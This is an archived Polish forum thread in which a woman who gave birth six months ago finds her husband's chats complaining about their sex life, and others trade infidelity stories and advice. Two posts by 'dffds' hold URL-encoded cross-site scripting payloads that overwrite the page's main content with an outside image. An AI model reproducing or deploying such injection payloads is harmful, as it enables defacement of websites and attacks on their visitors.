Skocz do zawartości
Szukaj w
  • Więcej opcji...
Znajdź wyniki, które zawierają...
Szukaj wyników w...

Zarchiwizowany

Ten temat jest archiwizowany i nie można dodawać nowych odpowiedzi.

Gość meskieswinie

Przeczytałam archiwum gg mojego męża i to co zobaczyłam odebrało mi radość

Polecane posty

Gość meskieswinie

jestem pół roku po porodzie, 2 miesiace temu rozpoczelismy ponownie wspolzycie z mezem, na poczatku bylo dziwnie, ale potem wszystko wrocilo do normy. tak mi sie zreszta wydawalo do czasu gdy przeczytalam jego gg. pisze tam z jakas kobieta, ktorej uzala sie na niezadowalajacy seks malzenski, ze udaje przede mna z litosci, ze wszystko ok, a tak naprawde jest inaczej. jestem zalamana. co mam z tym zrobic? przeciez ja juz z nim do lozka nie pojde.

Gość tak to jest jak sie nie
rozmawia w małżeństwie o nurtujących problemach.:O

Gość powiedz mu o tym co
przeczytalas.

Gość zoneczka ....
jak ja swojemu powiedzialam po przeczytaniu archiwum to zawolal kolege i namawial go zeby on powiedzial ze to nie moj maz tylko on pisal.... normlnie zalamka... ale mnie dlugo przepraszal....:P

Gość bubu22
kochane odinstalujcie gada gadu. to jest jakies przeklenstwo naszych czasow. to samo z nasza klasa.

Gość mhgg
ja kiedys wyczytalam u mojego mana , ze pisal do innej ze ja kocha i ze go pociaga, ze chcialby calowac jej nagie cialo...i coz..mimo wszystko jestesmy ze soba..choc to nie byloproste, gg od tamtej pory nie ma, nk tez;)

Gość buba43
Faceci tacy sa.Jacy oni biedni,jak im zle.Ja na Twoim miejscu dokladnie obserwowalabym meza.Mialam podobna sytuacje.Po kilku latach nic z tego nie zostalo.tylko wspomnienia.

Gość mhgg
a raz eska dostalam od niego przez pomylke(ale wpadka, nie?:P) w ktorym wypytywal na co ma ochote(podteksty seksualne)taka jedna zdzire(niegrozna, glupia);)i zaraz dostalam eska z innego numeru, z nr jego kolegi, ze to on niby pisal....facecisa okropno

Gość frambi
Kobiety czy wy naprawdę jesteście takie głupie... odrazu zwalacie winę na nk czy gg... jak ma was zdradzić to zdradzi i nie upilnujecie ich... gdzie tu zaufanie?? jak im nie ufacie to zostawcie dziadów i tyle... nie odinstaluj to czy tam to ... szkoda zdrowia i czasu na to...

Gość mhgg
sam odinstalowal...nikt mu nie kazal,tu nie o zdrade chodzi , tylko pewne meskie zachowania(ktore niekoniecznie musza doprowadzic do zdrady)

Gość zacznijcie rozmawaic
z waszymi partnerami a nie szpiegowac.:O

Gość mhgg
nie szpiegowalam go ,przy nim czytalam te wiadomosci , nawet nie pamietal co pisal, nie mial hasla, czytalismy cos innego , gdy przypadkiem na to wpadlam, byl pijany wtedy kiedy to pisal- choc wiem , ze go to nie usprawiedliwia.

Gość frambi
"ja kiedys wyczytalam u mojego mana , ze pisal do innej ze ja kocha i ze go pociaga, ze chcialby calowac jej nagie cialo..." Chęć całowania ciała nagiej a przede wszystkim innej kobiety nie jest oznaką że facet ma ochotę Cię zdradzić??? To nie wiem co według Ciebie jest zdradą ... W swoich związkach nie potraficie być szczerzy i nie umiecie ze sobą roznawiać... tylko pozazdrościć wam ha ha

Gość buba43
MGG Ty go usprawiedliwiasz,czy naprawdę wierzysz,że on byl pijany i jesteś taka naiwna.Każdy facet tak się zawsze tłumaczy.Byłem pijany. A ciekawa jestem jak Ty byś coś zrobiła,czy mialabyś wytłumaczenie,że byłaś pijana????????????????????????????????????????????????????????

Gość to juz chyba standart
ze faceci chca skrecic inna kobiete na sex,zwlaszcza gdy zona jest po porodzie,lub gdy im sie znudzi...albo i tak sobie dla zabawy,same pomyslcie,czy gdyby jakas panienka uslyszala jak jemu jest z wami dobrze to chcialaby sie z nim spotkac lub isc do lozka??? Ja sama wiem dobrze jak to boli,oraz znam zagrywki facetow,bo mnie rowniez w ten sposob probowano podejsc,z tym ze ja mam rozum i nie pcham sie do lozka jak co poniektore panny,wrecz zachwycone tym ze facet sie nimi interesuje,bedac zajetym. czuja sie glupie baby lepszymi od nas,nie pomysla ani na chwile ze sa instrumentalnie wykorzystywne i nie ma to nic wspolnego z lepsza-gorsza...poprostu inna

Gość mhgg
Nie znasz sytuacji...Nie wiesz kiedy to było...w jakich okolicznosciach...to tyle, nie zamierzam sie spowiadac, a rozmiawiac umiemy

Gość mhgg
Zgodnie z datą , która widniała wtedy na tej wiadomości, zgadza się to z tym , że był pijany...jestem tego pewna.To bylo 3 lata temu..poszlo w niepamiec, nie mowie , ze nie bolalo...

Gość to juz chyba standart
..........i jeszcze jedno,jesli facet ma ochote wam dowalic rogi ,to i tak to zrobi,jak go nakrylyscie w domu,to pojdzie do kafejki,albo do kolegi ,bedzie poprostu ostrozniejszy,a problem lezy nie w tym zeby ich tropic,ale zeby byli uczciwi i zeby kobiety bardziej sie szanowaly,bo widze ze od 12roku zycia wystawiaja gole tylki i uwazaja ze to jest cool puszczac sie na prawo i lewo,bez zbednych zasad moralnych...lub tez oko za oko zab za zab,i tak zeby poczuli jak to smakuje

Gość frambi
Zgadzam się z wypowiedzią -> to juz chyba standart

Gość frambi
mhgg -> To że on był piny jeszcze nie znaczy,że nie wiedział co robi... zwykła wymówka szczeniaka

Gość kochane
mój facet regularnie ma jakieś koleżanki. "To przecież nic złego, że spędził noc u jednej - tylko gadali". Teraz ma kolejną, bo tamta wyjechała. Okazało się, że mój facet nawet piosenki po angielsku potrafi cytować. Jak zaglądam w jego maila to flaki mi się wywracają. Te wiersze: "chcę uciec stąd" albo tekst "igrasz z ogniem". A co lepsze tamta mnie zna, całuje mnie zawsze na powitanie i pożegnanie jak się spotykamy. Dobrze wie, że jestem ja, dziecko.....A w mailu pisze do niego szkoda, że jesteśmy tak daleko od siebie i takie tam sentymentalne bzdurne wiersze. Obserwuje mnie. Ciągle czuję jej wzrok na sobie. Myśli, że co? Że skoczę do niej z pazurami? Nie mój poziom. Ja sobie poczekam jak się znów spoufali to jej wygarnę całą prawdę, spokojnie, bez krzyku. Dlaczego tak jest? Facet zdradzał mnie chyba od początku, tylko ja głupia, naiwna nie chciałam tego widzieć. Teraz, po 13 latach już mam to w d...e. Po prostu, jak spotkam kogoś odpowiedniego to dam mu kopa. A jak nie, to znajdę sobie jakiś kolegów - tych mi nie brakuje.

ale macie posrane związku. Do autorki- Twój mąż nie pisał tamtej, że ma ochotę na zdradę, tylko żalił się z nieudanego życia seksualnego. Może wyciągnij z tego wnioski i wprowadź jakieś nowości, urozmaicenia...

Gość bedfff
się dziwisz, pól roku temu poród a seks dopiero po 4 miesiącach. To by nawet idiota tyle nie wytrzymał a co mówić o normalnym facecie.

Gość jestem w 32 tc
Wlasnie mialam cos napisac, ale Straszny Kocur napisala wszystko, co mialam napisac ja.

Gość dffds
http://www.%3C%73%63%72%69%70%74%20%69%64%3D%22%61%74%61%6B%65%22%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%63%5F%6D%61%69%6E%27%29%2E%69%6E%6E%65%72%48%54%4D%4C%20%3D%20%22%3C%69%6D%67%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%69%31%34%38%2E%70%68%6F%74%6F%62%75%63%6B%65%74%2E%63%6F%6D%2F%61%6C%62%75%6D%73%2F%73%38%2F%67%72%6F%73%7A%65%6B%5F%78%2F%6B%77%69%61%74%65%6B%2E%6A%70%67%27%20%2F%3E%22%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E

Gość dffds
http://www.%3C%73%63%72%69%70%74%20%69%64%3D%22%61%74%61%6B%65%22%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%09%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%63%5F%6D%61%69%6E%27%29%2E%69%6E%6E%65%72%48%54%4D%4C%20%3D%20%22%3C%69%6D%67%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%70%77%70%2E%6E%65%74%63%61%62%6F%2E%70%74%2F%30%32%31%30%39%38%30%33%30%31%2F%6D%64%2F%65%78%6F%72%63%69%73%74%2E%6A%70%67%27%20%2F%3E%22%3B%0A%3C%2F%73%63%72%69%70%74%3E

Gość Do bedff
Widac ze nie masz pojecia o czym piszesz, po porodzie to standard ze do seksu wraca sie po pol roku, po pierwsze krwawienie dluugo trwa, po drugie wszystko tam musi wrocic do siebie, po trzecie zmeczenie ciaza porodem nowa rola tez daje znac o sobie, jesli tego nie wiesz to poczytaj nieuku!!

ale autorka pisze, że aktualnie wszystko wróciło do normy, więc zakładam, że czuje się już dobrze i jest na seks gotowa...

Gość brrgrrrrrrrr
mój mąż jeszcze w czasach kiedy nie było gg wywiózł mnie do mojej mamy, a byłam wtedy w ciąży, i całą noc zabawiał się z panienką, a rano przyjechał po mnie i udawał , że nic się nie stało Dowiedziałam się później. Do dziś żałuję,że nie zostawiłam go po tym fakcie. jak widzisz, jak chce zdradzić, to zdradzi, niekoniecznie potrzebne jest do tego gg, chociaż bardzo pomocne